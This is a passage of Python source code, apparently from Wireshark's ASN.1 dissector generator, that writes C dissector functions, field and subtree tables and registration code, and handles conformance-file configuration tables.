out += ', '.join(par[i])
if (i<(len(par)-1)): out += ',\n'
out += ');\n'
return out
#--- eth_type_fn_hdr --------------------------------------------------------
def eth_type_fn_hdr(self, tname):
out = '\n'
if (not self.eth_type[tname]['export'] & EF_TYPE):
out += 'static '
out += "int\n"
if (self.Ber()):
out += "dissect_%s_%s(gboolean implicit_tag _U_, tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_) {\n" % (self.eth_type[tname]['proto'], tname)
elif (self.Per()):
out += "dissect_%s_%s(tvbuff_t *tvb _U_, int offset _U_, asn1_ctx_t *actx _U_, proto_tree *tree _U_, int hf_index _U_) {\n" % (self.eth_type[tname]['proto'], tname)
#if self.conform.get_fn_presence(tname):
# out += self.conform.get_fn_text(tname, 'FN_HDR')
#el
if self.conform.get_fn_presence(self.eth_type[tname]['ref'][0]):
out += self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_HDR')
return out
#--- eth_type_fn_ftr --------------------------------------------------------
def eth_type_fn_ftr(self, tname):
out = '\n'
#if self.conform.get_fn_presence(tname):
# out += self.conform.get_fn_text(tname, 'FN_FTR')
#el
if self.conform.get_fn_presence(self.eth_type[tname]['ref'][0]):
out += self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_FTR')
out += " return offset;\n"
out += "}\n"
return out
#--- eth_type_fn_body -------------------------------------------------------
def eth_type_fn_body(self, tname, body, pars=None):
out = body
#if self.conform.get_fn_body_presence(tname):
# out = self.conform.get_fn_text(tname, 'FN_BODY')
#el
if self.conform.get_fn_body_presence(self.eth_type[tname]['ref'][0]):
out = self.conform.get_fn_text(self.eth_type[tname]['ref'][0], 'FN_BODY')
if pars:
try:
out = out % pars
except (TypeError):
pass
return out
#--- eth_out_pdu_decl ----------------------------------------------------------
def eth_out_pdu_decl(self, f):
t = self.eth_hf[f]['ethtype']
is_new = self.eth_hf[f]['pdu']['new']
out = ''
if (not self.eth_hf[f]['pdu']['export']):
out += 'static '
if (is_new):
out += 'int '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_);\n'
else:
out += 'void '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_);\n'
return out
#--- eth_output_hf ----------------------------------------------------------
def eth_output_hf (self):
if not len(self.eth_hf_ord) and not len(self.eth_hfpdu_ord) and not len(self.named_bit): return
fx = self.output.file_open('hf')
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
fx.write("%-50s/* %s */\n" % ("static int %s = -1; " % (self.eth_hf[f]['fullname']), self.eth_hf[f]['ethtype']))
if (self.named_bit):
fx.write('/* named bits */\n')
for nb in self.named_bit:
fx.write("static int %s = -1;\n" % (nb['ethname']))
if (self.dummy_eag_field):
fx.write("static int %s = -1; /* never registered */\n" % (self.dummy_eag_field))
self.output.file_close(fx)
#--- eth_output_hf_arr ------------------------------------------------------
def eth_output_hf_arr (self):
if not len(self.eth_hf_ord) and not len(self.eth_hfpdu_ord) and not len(self.named_bit): return
fx = self.output.file_open('hfarr')
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
t = self.eth_hf[f]['ethtype']
if self.remove_prefix and t.startswith(self.remove_prefix):
t = t[len(self.remove_prefix):]
name=self.eth_hf[f]['attr']['NAME']
try: # Python < 3
trantab = maketrans("- ", "__")
except:
trantab = str.maketrans("- ", "__")
name = name.translate(trantab)
namelower = name.lower()
tquoted_lower = '"' + t.lower() + '"'
# Try to avoid giving blurbs that give no more info than the name
if tquoted_lower == namelower or \
t == "NULL" or \
tquoted_lower.replace("t_", "") == namelower:
blurb = 'NULL'
else:
blurb = '"%s"' % (t)
attr = self.eth_hf[f]['attr'].copy()
if attr['TYPE'] == 'FT_NONE':
attr['ABBREV'] = '"%s.%s_element"' % (self.proto, attr['ABBREV'])
else:
attr['ABBREV'] = '"%s.%s"' % (self.proto, attr['ABBREV'])
if 'BLURB' not in attr:
attr['BLURB'] = blurb
fx.write(' { &%s,\n' % (self.eth_hf[f]['fullname']))
fx.write(' { %(NAME)s, %(ABBREV)s,\n' % attr)
fx.write(' %(TYPE)s, %(DISPLAY)s, %(STRINGS)s, %(BITMASK)s,\n' % attr)
fx.write(' %(BLURB)s, HFILL }},\n' % attr)
for nb in self.named_bit:
fx.write(' { &%s,\n' % (nb['ethname']))
fx.write(' { "%s", "%s.%s",\n' % (nb['name'], self.proto, nb['name']))
fx.write(' %s, %s, %s, %s,\n' % (nb['ftype'], nb['display'], nb['strings'], nb['bitmask']))
fx.write(' NULL, HFILL }},\n')
self.output.file_close(fx)
#--- eth_output_ett ---------------------------------------------------------
def eth_output_ett (self):
fx = self.output.file_open('ett')
fempty = True
#fx.write("static gint ett_%s = -1;\n" % (self.eproto))
for t in self.eth_type_ord:
if self.eth_type[t]['tree']:
fx.write("static gint %s = -1;\n" % (self.eth_type[t]['tree']))
fempty = False
self.output.file_close(fx, discard=fempty)
#--- eth_output_ett_arr -----------------------------------------------------
def eth_output_ett_arr(self):
fx = self.output.file_open('ettarr')
fempty = True
#fx.write(" &ett_%s,\n" % (self.eproto))
for t in self.eth_type_ord:
if self.eth_type[t]['tree']:
fx.write(" &%s,\n" % (self.eth_type[t]['tree']))
fempty = False
self.output.file_close(fx, discard=fempty)
#--- eth_output_export ------------------------------------------------------
def eth_output_export(self):
fx = self.output.file_open('exp', ext='h')
for t in self.eth_export_ord: # vals
if (self.eth_type[t]['export'] & EF_ENUM) and self.eth_type[t]['val'].eth_has_enum(t, self):
fx.write(self.eth_type[t]['val'].eth_type_enum(t, self))
if (self.eth_type[t]['export'] & EF_VALS) and self.eth_type[t]['val'].eth_has_vals():
if not self.eth_type[t]['export'] & EF_TABLE:
if self.eth_type[t]['export'] & EF_WS_DLL:
fx.write("WS_DLL_PUBLIC ")
else:
fx.write("extern ")
fx.write("const value_string %s[];\n" % (self.eth_vals_nm(t)))
else:
fx.write(self.eth_type[t]['val'].eth_type_vals(t, self))
for t in self.eth_export_ord: # functions
if (self.eth_type[t]['export'] & EF_TYPE):
if self.eth_type[t]['export'] & EF_EXTERN:
if self.eth_type[t]['export'] & EF_WS_DLL:
fx.write("WS_DLL_PUBLIC ")
else:
fx.write("extern ")
fx.write(self.eth_type_fn_h(t))
for f in self.eth_hfpdu_ord: # PDUs
if (self.eth_hf[f]['pdu'] and self.eth_hf[f]['pdu']['export']):
fx.write(self.eth_out_pdu_decl(f))
self.output.file_close(fx)
#--- eth_output_expcnf ------------------------------------------------------
def eth_output_expcnf(self):
fx = self.output.file_open('exp', ext='cnf')
fx.write('#.MODULE\n')
maxw = 0
for (m, p) in self.modules:
if (len(m) > maxw): maxw = len(m)
for (m, p) in self.modules:
fx.write("%-*s %s\n" % (maxw, m, p))
fx.write('#.END\n\n')
for cls in self.objectclass_ord:
if self.objectclass[cls]['export']:
cnm = cls
if self.objectclass[cls]['export'] & EF_MODULE:
cnm = "$%s$%s" % (self.objectclass[cls]['module'], cnm)
fx.write('#.CLASS %s\n' % (cnm))
maxw = 2
for fld in self.objectclass[cls]['val'].fields:
w = len(fld.fld_repr()[0])
if (w > maxw): maxw = w
for fld in self.objectclass[cls]['val'].fields:
repr = fld.fld_repr()
fx.write('%-*s %s\n' % (maxw, repr[0], ' '.join(repr[1:])))
fx.write('#.END\n\n')
if self.Ber():
fx.write('#.IMPORT_TAG\n')
for t in self.eth_export_ord: # tags
if (self.eth_type[t]['export'] & EF_TYPE):
fx.write('%-24s ' % self.eth_type[t]['ref'][0])
fx.write('%s %s\n' % self.eth_type[t]['val'].GetTag(self))
fx.write('#.END\n\n')
fx.write('#.TYPE_ATTR\n')
for t in self.eth_export_ord: # attributes
if (self.eth_type[t]['export'] & EF_TYPE):
tnm = self.eth_type[t]['ref'][0]
if self.eth_type[t]['export'] & EF_MODULE:
tnm = "$%s$%s" % (self.type[tnm]['module'], tnm)
fx.write('%-24s ' % tnm)
attr = self.eth_get_type_attr(self.eth_type[t]['ref'][0]).copy()
fx.write('TYPE = %(TYPE)-9s DISPLAY = %(DISPLAY)-9s STRINGS = %(STRINGS)s BITMASK = %(BITMASK)s\n' % attr)
fx.write('#.END\n\n')
self.output.file_close(fx, keep_anyway=True)
#--- eth_output_val ------------------------------------------------------
def eth_output_val(self):
fx = self.output.file_open('val', ext='h')
for v in self.eth_value_ord1:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
fx.write("#define %-30s %s\n" % (v, vv))
for t in self.eth_type_ord1:
if self.eth_type[t]['import']:
continue
if self.eth_type[t]['val'].eth_has_enum(t, self) and not (self.eth_type[t]['export'] & EF_ENUM):
fx.write(self.eth_type[t]['val'].eth_type_enum(t, self))
self.output.file_close(fx)
#--- eth_output_valexp ------------------------------------------------------
def eth_output_valexp(self):
if (not len(self.eth_vexport_ord)): return
fx = self.output.file_open('valexp', ext='h')
for v in self.eth_vexport_ord:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
fx.write("#define %-30s %s\n" % (v, vv))
self.output.file_close(fx)
#--- eth_output_types -------------------------------------------------------
def eth_output_types(self):
def out_pdu(f):
t = self.eth_hf[f]['ethtype']
is_new = self.eth_hf[f]['pdu']['new']
impl = 'FALSE'
out = ''
if (not self.eth_hf[f]['pdu']['export']):
out += 'static '
if (is_new):
out += 'int '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_) {\n'
else:
out += 'void '
out += 'dissect_'+f+'(tvbuff_t *tvb _U_, packet_info *pinfo _U_, proto_tree *tree _U_) {\n'
if (is_new):
out += ' int offset = 0;\n'
off_par = 'offset'
ret_par = 'offset'
else:
off_par = '0'
ret_par = None
if (self.Per()):
if (self.Aligned()):
aligned = 'TRUE'
else:
aligned = 'FALSE'
out += " asn1_ctx_t asn1_ctx;\n"
out += self.eth_fn_call('asn1_ctx_init', par=(('&asn1_ctx', 'ASN1_ENC_PER', aligned, 'pinfo'),))
if (self.Ber()):
out += " asn1_ctx_t asn1_ctx;\n"
out += self.eth_fn_call('asn1_ctx_init', par=(('&asn1_ctx', 'ASN1_ENC_BER', 'TRUE', 'pinfo'),))
par=((impl, 'tvb', off_par,'&asn1_ctx', 'tree', self.eth_hf[f]['fullname']),)
elif (self.Per()):
par=(('tvb', off_par, '&asn1_ctx', 'tree', self.eth_hf[f]['fullname']),)
else:
par=((),)
out += self.eth_fn_call('dissect_%s_%s' % (self.eth_type[t]['proto'], t), ret=ret_par, par=par)
if (self.Per() and is_new):
out += ' offset += 7; offset >>= 3;\n'
if (is_new):
out += ' return offset;\n'
out += '}\n'
return out
#end out_pdu()
fx = self.output.file_open('fn')
pos = fx.tell()
if (len(self.eth_hfpdu_ord)):
first_decl = True
for f in self.eth_hfpdu_ord:
if (self.eth_hf[f]['pdu'] and self.eth_hf[f]['pdu']['need_decl']):
if first_decl:
fx.write('/*--- PDUs declarations ---*/\n')
first_decl = False
fx.write(self.eth_out_pdu_decl(f))
if not first_decl:
fx.write('\n')
if self.eth_dep_cycle:
fx.write('/*--- Cyclic dependencies ---*/\n\n')
i = 0
while i < len(self.eth_dep_cycle):
t = self.type[self.eth_dep_cycle[i][0]]['ethname']
if self.dep_cycle_eth_type[t][0] != i: i += 1; continue
fx.write(''.join(['/* %s */\n' % ' -> '.join(self.eth_dep_cycle[i]) for i in self.dep_cycle_eth_type[t]]))
fx.write(self.eth_type_fn_h(t))
fx.write('\n')
i += 1
fx.write('\n')
for t in self.eth_type_ord1:
if self.eth_type[t]['import']:
continue
if self.eth_type[t]['val'].eth_has_vals():
if self.eth_type[t]['no_emit'] & EF_VALS:
pass
elif self.eth_type[t]['user_def'] & EF_VALS:
fx.write("extern const value_string %s[];\n" % (self.eth_vals_nm(t)))
elif (self.eth_type[t]['export'] & EF_VALS) and (self.eth_type[t]['export'] & EF_TABLE):
pass
else:
fx.write(self.eth_type[t]['val'].eth_type_vals(t, self))
if self.eth_type[t]['no_emit'] & EF_TYPE:
pass
elif self.eth_type[t]['user_def'] & EF_TYPE:
fx.write(self.eth_type_fn_h(t))
else:
fx.write(self.eth_type[t]['val'].eth_type_fn(self.eth_type[t]['proto'], t, self))
fx.write('\n')
if (len(self.eth_hfpdu_ord)):
fx.write('/*--- PDUs ---*/\n\n')
for f in self.eth_hfpdu_ord:
if (self.eth_hf[f]['pdu']):
if (f in self.emitted_pdu):
fx.write(" /* %s already emitted */\n" % (f))
else:
fx.write(out_pdu(f))
self.emitted_pdu[f] = True
fx.write('\n')
fempty = pos == fx.tell()
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_hnd -----------------------------------------------------
def eth_output_dis_hnd(self):
fx = self.output.file_open('dis-hnd')
fempty = True
for f in self.eth_hfpdu_ord:
pdu = self.eth_hf[f]['pdu']
if (pdu and pdu['reg'] and not pdu['hidden']):
dis = self.proto
if (pdu['reg'] != '.'):
dis += '.' + pdu['reg']
fx.write('static dissector_handle_t %s_handle;\n' % (asn2c(dis)))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_reg -----------------------------------------------------
def eth_output_dis_reg(self):
fx = self.output.file_open('dis-reg')
fempty = True
for f in self.eth_hfpdu_ord:
pdu = self.eth_hf[f]['pdu']
if (pdu and pdu['reg']):
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
dis = self.proto
if (pdu['reg'] != '.'): dis += '.' + pdu['reg']
fx.write(' %sregister_dissector("%s", dissect_%s, proto_%s);\n' % (new_prefix, dis, f, self.eproto))
if (not pdu['hidden']):
fx.write(' %s_handle = find_dissector("%s");\n' % (asn2c(dis), dis))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_dis_tab -----------------------------------------------------
def eth_output_dis_tab(self):
fx = self.output.file_open('dis-tab')
fempty = True
for k in self.conform.get_order('REGISTER'):
reg = self.conform.use_item('REGISTER', k)
if reg['pdu'] not in self.field: continue
f = self.field[reg['pdu']]['ethname']
pdu = self.eth_hf[f]['pdu']
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
if (reg['rtype'] in ('NUM', 'STR')):
rstr = ''
if (reg['rtype'] == 'STR'):
rstr = 'string'
else:
rstr = 'uint'
if (pdu['reg']):
dis = self.proto
if (pdu['reg'] != '.'): dis += '.' + pdu['reg']
if (not pdu['hidden']):
hnd = '%s_handle' % (asn2c(dis))
else:
hnd = 'find_dissector("%s")' % (dis)
else:
hnd = '%screate_dissector_handle(dissect_%s, proto_%s)' % (new_prefix, f, self.eproto)
rport = self.value_get_eth(reg['rport'])
fx.write(' dissector_add_%s("%s", %s, %s);\n' % (rstr, reg['rtable'], rport, hnd))
elif (reg['rtype'] in ('BER', 'PER')):
roid = self.value_get_eth(reg['roid'])
fx.write(' %sregister_%s_oid_dissector(%s, dissect_%s, proto_%s, %s);\n' % (new_prefix, reg['rtype'].lower(), roid, f, self.eproto, reg['roidname']))
fempty = False
fx.write('\n')
self.output.file_close(fx, discard=fempty)
#--- eth_output_syn_reg -----------------------------------------------------
def eth_output_syn_reg(self):
fx = self.output.file_open('syn-reg')
fempty = True
first_decl = True
for k in self.conform.get_order('SYNTAX'):
reg = self.conform.use_item('SYNTAX', k)
if reg['pdu'] not in self.field: continue
f = self.field[reg['pdu']]['ethname']
pdu = self.eth_hf[f]['pdu']
new_prefix = ''
if (pdu['new']): new_prefix = 'new_'
if first_decl:
fx.write(' /*--- Syntax registrations ---*/\n')
first_decl = False
fx.write(' %sregister_ber_syntax_dissector(%s, proto_%s, dissect_%s_PDU);\n' % (new_prefix, k, self.eproto, reg['pdu']));
fempty=False
self.output.file_close(fx, discard=fempty)
#--- eth_output_tables -----------------------------------------------------
def eth_output_tables(self):
for num in list(self.conform.report.keys()):
fx = self.output.file_open('table' + num)
for rep in self.conform.report[num]:
self.eth_output_table(fx, rep)
self.output.file_close(fx)
#--- eth_output_table -----------------------------------------------------
def eth_output_table(self, fx, rep):
if rep['type'] == 'HDR':
fx.write('\n')
if rep['var']:
var = rep['var']
var_list = var.split('.', 1)
cls = var_list[0]
del var_list[0]
flds = []
not_flds = []
sort_flds = []
for f in var_list:
if f[0] == '!':
not_flds.append(f[1:])
continue
if f[0] == '#':
flds.append(f[1:])
sort_flds.append(f)
continue
if f[0] == '@':
flds.append(f[1:])
sort_flds.append(f[1:])
continue
flds.append(f)
objs = {}
objs_ord = []
if (cls in self.oassign_cls):
for ident in self.oassign_cls[cls]:
obj = self.get_obj_repr(ident, flds, not_flds)
if not obj:
continue
obj['_LOOP'] = var
obj['_DICT'] = str(obj)
objs[ident] = obj
objs_ord.append(ident)
if (sort_flds):
# Sort identifiers according to the matching object in objs.
# The order is determined by sort_flds, keys prefixed by a
# '#' are compared numerically.
def obj_key_fn(name):
obj = objs[name]
return list(
int(obj[f[1:]]) if f[0] == '#' else obj[f]
for f in sort_flds
)
objs_ord.sort(key=obj_key_fn)
for ident in objs_ord:
obj = objs[ident]
try:
text = rep['text'] % obj
except (KeyError):
raise sys.exc_info()[0]("%s:%s invalid key %s for information object %s of %s" % (rep['fn'], rep['lineno'], sys.exc_info()[1], ident, var))
fx.write(text)
else:
fx.write("/* Unknown or empty loop list %s */\n" % (var))
else:
fx.write(rep['text'])
if rep['type'] == 'FTR':
fx.write('\n')
#--- dupl_report -----------------------------------------------------
def dupl_report(self):
# types
tmplist = sorted(self.eth_type_dupl.keys())
for t in tmplist:
msg = "The same type names for different types. Explicit type renaming is recommended.\n"
msg += t + "\n"
for tt in self.eth_type_dupl[t]:
msg += " %-20s %s\n" % (self.type[tt]['ethname'], tt)
warnings.warn_explicit(msg, UserWarning, '', 0)
# fields
tmplist = list(self.eth_hf_dupl.keys())
tmplist.sort()
for f in tmplist:
msg = "The same field names for different types. Explicit field renaming is recommended.\n"
msg += f + "\n"
for tt in list(self.eth_hf_dupl[f].keys()):
msg += " %-20s %-20s " % (self.eth_hf_dupl[f][tt], tt)
msg += ", ".join(self.eth_hf[self.eth_hf_dupl[f][tt]]['ref'])
msg += "\n"
warnings.warn_explicit(msg, UserWarning, '', 0)
#--- eth_do_output ------------------------------------------------------------
def eth_do_output(self):
if self.dbg('a'):
print("\n# Assignments")
for a in self.assign_ord:
v = ' '
if (self.assign[a]['virt']): v = '*'
print(v, a)
print("\n# Value assignments")
for a in self.vassign_ord:
print(' ', a)
print("\n# Information object assignments")
for a in self.oassign_ord:
print(" %-12s (%s)" % (a, self.oassign[a].cls))
if self.dbg('t'):
print("\n# Imported Types")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.type_imp:
print("%-40s %-24s %-24s" % (t, self.type[t]['import'], self.type[t]['proto']))
print("\n# Imported Values")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.value_imp:
print("%-40s %-24s %-24s" % (t, self.value[t]['import'], self.value[t]['proto']))
print("\n# Imported Object Classes")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.objectclass_imp:
print("%-40s %-24s %-24s" % (t, self.objectclass[t]['import'], self.objectclass[t]['proto']))
print("\n# Exported Types")
print("%-31s %s" % ("Wireshark type", "Export Flag"))
print("-" * 100)
for t in self.eth_export_ord:
print("%-31s 0x%02X" % (t, self.eth_type[t]['export']))
print("\n# Exported Values")
print("%-40s %s" % ("Wireshark name", "Value"))
print("-" * 100)
for v in self.eth_vexport_ord:
vv = self.eth_value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
print("%-40s %s" % (v, vv))
print("\n# ASN.1 Object Classes")
print("%-40s %-24s %-24s" % ("ASN.1 name", "Module", "Protocol"))
print("-" * 100)
for t in self.objectclass_ord:
print("%-40s " % (t))
print("\n# ASN.1 Types")
print("%-49s %-24s %-24s" % ("ASN.1 unique name", "'tname'", "Wireshark type"))
print("-" * 100)
for t in self.type_ord:
print("%-49s %-24s %-24s" % (t, self.type[t]['tname'], self.type[t]['ethname']))
print("\n# Wireshark Types")
print("Wireshark type References (ASN.1 types)")
print("-" * 100)
for t in self.eth_type_ord:
sys.stdout.write("%-31s %d" % (t, len(self.eth_type[t]['ref'])))
print(', '.join(self.eth_type[t]['ref']))
print("\n# ASN.1 Values")
print("%-40s %-18s %-20s %s" % ("ASN.1 unique name", "Type", "Value", "Wireshark value"))
print("-" * 100)
for v in self.value_ord:
vv = self.value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
print("%-40s %-18s %-20s %s" % (v, self.value[v]['type'].eth_tname(), vv, self.value[v]['ethname']))
#print "\n# Wireshark Values"
#print "%-40s %s" % ("Wireshark name", "Value")
#print "-" * 100
#for v in self.eth_value_ord:
# vv = self.eth_value[v]['value']
# if isinstance (vv, Value):
# vv = vv.to_str(self)
# print "%-40s %s" % (v, vv)
print("\n# ASN.1 Fields")
print("ASN.1 unique name Wireshark name ASN.1 type")
print("-" * 100)
for f in (self.pdu_ord + self.field_ord):
print("%-40s %-20s %s" % (f, self.field[f]['ethname'], self.field[f]['type']))
print("\n# Wireshark Fields")
print("Wireshark name Wireshark type References (ASN.1 fields)")
print("-" * 100)
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
sys.stdout.write("%-30s %-20s %s" % (f, self.eth_hf[f]['ethtype'], len(self.eth_hf[f]['ref'])))
print(', '.join(self.eth_hf[f]['ref']))
#print "\n# Order after dependencies"
#print '\n'.join(self.eth_type_ord1)
print("\n# Cyclic dependencies")
for c in self.eth_dep_cycle:
print(' -> '.join(c))
self.dupl_report()
self.output.outnm = self.outnm_opt
if (not self.output.outnm):
self.output.outnm = self.proto
self.output.outnm = self.output.outnm.replace('.', '-')
if not self.justexpcnf:
self.eth_output_hf()
self.eth_output_ett()
self.eth_output_types()
self.eth_output_hf_arr()
self.eth_output_ett_arr()
self.eth_output_export()
self.eth_output_val()
self.eth_output_valexp()
self.eth_output_dis_hnd()
self.eth_output_dis_reg()
self.eth_output_dis_tab()
self.eth_output_syn_reg()
self.eth_output_tables()
if self.expcnf:
self.eth_output_expcnf()
def dbg_modules(self):
def print_mod(m):
sys.stdout.write("%-30s " % (m))
dep = self.module[m][:]
for i in range(len(dep)):
if dep[i] not in self.module:
dep[i] = '*' + dep[i]
print(', '.join(dep))
# end of print_mod()
(mod_ord, mod_cyc) = dependency_compute(self.module_ord, self.module, ignore_fn = lambda t: t not in self.module)
print("\n# ASN.1 Moudules")
print("Module name Dependency")
print("-" * 100)
new_ord = False
for m in (self.module_ord):
print_mod(m)
new_ord = new_ord or (self.module_ord.index(m) != mod_ord.index(m))
if new_ord:
print("\n# ASN.1 Moudules - in dependency order")
print("Module name Dependency")
print("-" * 100)
for m in (mod_ord):
print_mod(m)
if mod_cyc:
print("\nCyclic dependencies:")
for i in (list(range(len(mod_cyc)))):
print("%02d: %s" % (i + 1, str(mod_cyc[i])))
#--- EthCnf -------------------------------------------------------------------
class EthCnf:
def __init__(self):
self.ectx = None
self.tblcfg = {}
self.table = {}
self.order = {}
self.fn = {}
self.report = {}
self.suppress_line = False
self.include_path = []
# Value name Default value Duplicity check Usage check
self.tblcfg['EXPORTS'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['MAKE_ENUM'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['USE_VALS_EXT'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['PDU'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['SYNTAX'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['REGISTER'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['USER_DEFINED'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['NO_EMIT'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['MODULE'] = { 'val_nm' : 'proto', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['OMIT_ASSIGNMENT'] = { 'val_nm' : 'omit', 'val_dflt' : False, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['NO_OMIT_ASSGN'] = { 'val_nm' : 'omit', 'val_dflt' : True, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['VIRTUAL_ASSGN'] = { 'val_nm' : 'name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['SET_TYPE'] = { 'val_nm' : 'type', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['TYPE_RENAME'] = { 'val_nm' : 'eth_name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['FIELD_RENAME'] = { 'val_nm' : 'eth_name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['IMPORT_TAG'] = { 'val_nm' : 'ttag', 'val_dflt' : (), 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['FN_PARS'] = { 'val_nm' : 'pars', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['TYPE_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['ETYPE_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['FIELD_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['EFIELD_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['ASSIGNED_ID'] = { 'val_nm' : 'ids', 'val_dflt' : {}, 'chk_dup' : False,'chk_use' : False }
self.tblcfg['ASSIGN_VALUE_TO_TYPE'] = { 'val_nm' : 'name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
for k in list(self.tblcfg.keys()) :
self.table[k] = {}
self.order[k] = []
def add_item(self, table, key, fn, lineno, **kw):
if self.tblcfg[table]['chk_dup'] and key in self.table[table]:
warnings.warn_explicit("Duplicated %s for %s. Previous one is at %s:%d" %
(table, key, self.table[table][key]['fn'], self.table[table][key]['lineno']),
UserWarning, fn, lineno)
return
self.table[table][key] = {'fn' : fn, 'lineno' : lineno, 'used' : False}
self.table[table][key].update(kw)
self.order[table].append(key)
def update_item(self, table, key, fn, lineno, **kw):
if key not in self.table[table]:
self.table[table][key] = {'fn' : fn, 'lineno' : lineno, 'used' : False}
self.order[table].append(key)
self.table[table][key][self.tblcfg[table]['val_nm']] = {}
self.table[table][key][self.tblcfg[table]['val_nm']].update(kw[self.tblcfg[table]['val_nm']])
def get_order(self, table):
return self.order[table]
def check_item(self, table, key):
return key in self.table[table]
def copy_item(self, table, dst_key, src_key):
if (src_key in self.table[table]):
self.table[table][dst_key] = self.table[table][src_key]
def check_item_value(self, table, key, **kw):
return key in self.table[table] and kw.get('val_nm', self.tblcfg[table]['val_nm']) in self.table[table][key]
def use_item(self, table, key, **kw):
vdflt = kw.get('val_dflt', self.tblcfg[table]['val_dflt'])
if key not in self.table[table]: return vdflt
vname = kw.get('val_nm', self.tblcfg[table]['val_nm'])
#print "use_item() - set used for %s %s" % (table, key)
self.table[table][key]['used'] = True
return self.table[table][key].get(vname, vdflt)
def omit_assignment(self, type, ident, module):
if self.ectx.conform.use_item('OMIT_ASSIGNMENT', ident):
return True
if self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*') or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*'+type) or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*/'+module) or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*'+type+'/'+module):
return self.ectx.conform.use_item('NO_OMIT_ASSGN', ident)
return False
def add_fn_line(self, name, ctx, line, fn, lineno):
if name not in self.fn:
self.fn[name] = {'FN_HDR' : None, 'FN_FTR' : None, 'FN_BODY' : None}
if (self.fn[name][ctx]):
self.fn[name][ctx]['text'] += line
else:
self.fn[name][ctx] = {'text' : line, 'used' : False,
'fn' : fn, 'lineno' : lineno}
def get_fn_presence(self, name):
#print "get_fn_presence('%s'):%s" % (name, str(self.fn.has_key(name)))
#if self.fn.has_key(name): print self.fn[name]
return name in self.fn
def get_fn_body_presence(self, name):
return name in self.fn and self.fn[name]['FN_BODY']
def get_fn_text(self, name, ctx):
if (name not in self.fn):
return '';
if (not self.fn[name][ctx]):
return '';
self.fn[name][ctx]['used'] = True
out = self.fn[name][ctx]['text']
if (not self.suppress_line):
out = '#line %u "%s"\n%s\n' % (self.fn[name][ctx]['lineno'], rel_dissector_path(self.fn[name][ctx]['fn']), out);
return out
def add_pdu(self, par, is_new, fn, lineno):
#print "add_pdu(par=%s, %s, %d)" % (str(par), fn, lineno)
(reg, hidden) = (None, False)
if (len(par) > 1): reg = par[1]
if (reg and reg[0]=='@'): (reg, hidden) = (reg[1:], True)
attr = {'new' : is_new, 'reg' : reg, 'hidden' : hidden, 'need_decl' : False, 'export' : False}
self.add_item('PDU', par[0], attr=attr, fn=fn, lineno=lineno)
return
def add_syntax(self, par, fn, lineno):
#print "add_syntax(par=%s, %s, %d)" % (str(par), fn, lineno)
if( (len(par) >=2)):
name = par[1]
else:
name = '"'+par[0]+'"'
attr = { 'pdu' : par[0] }
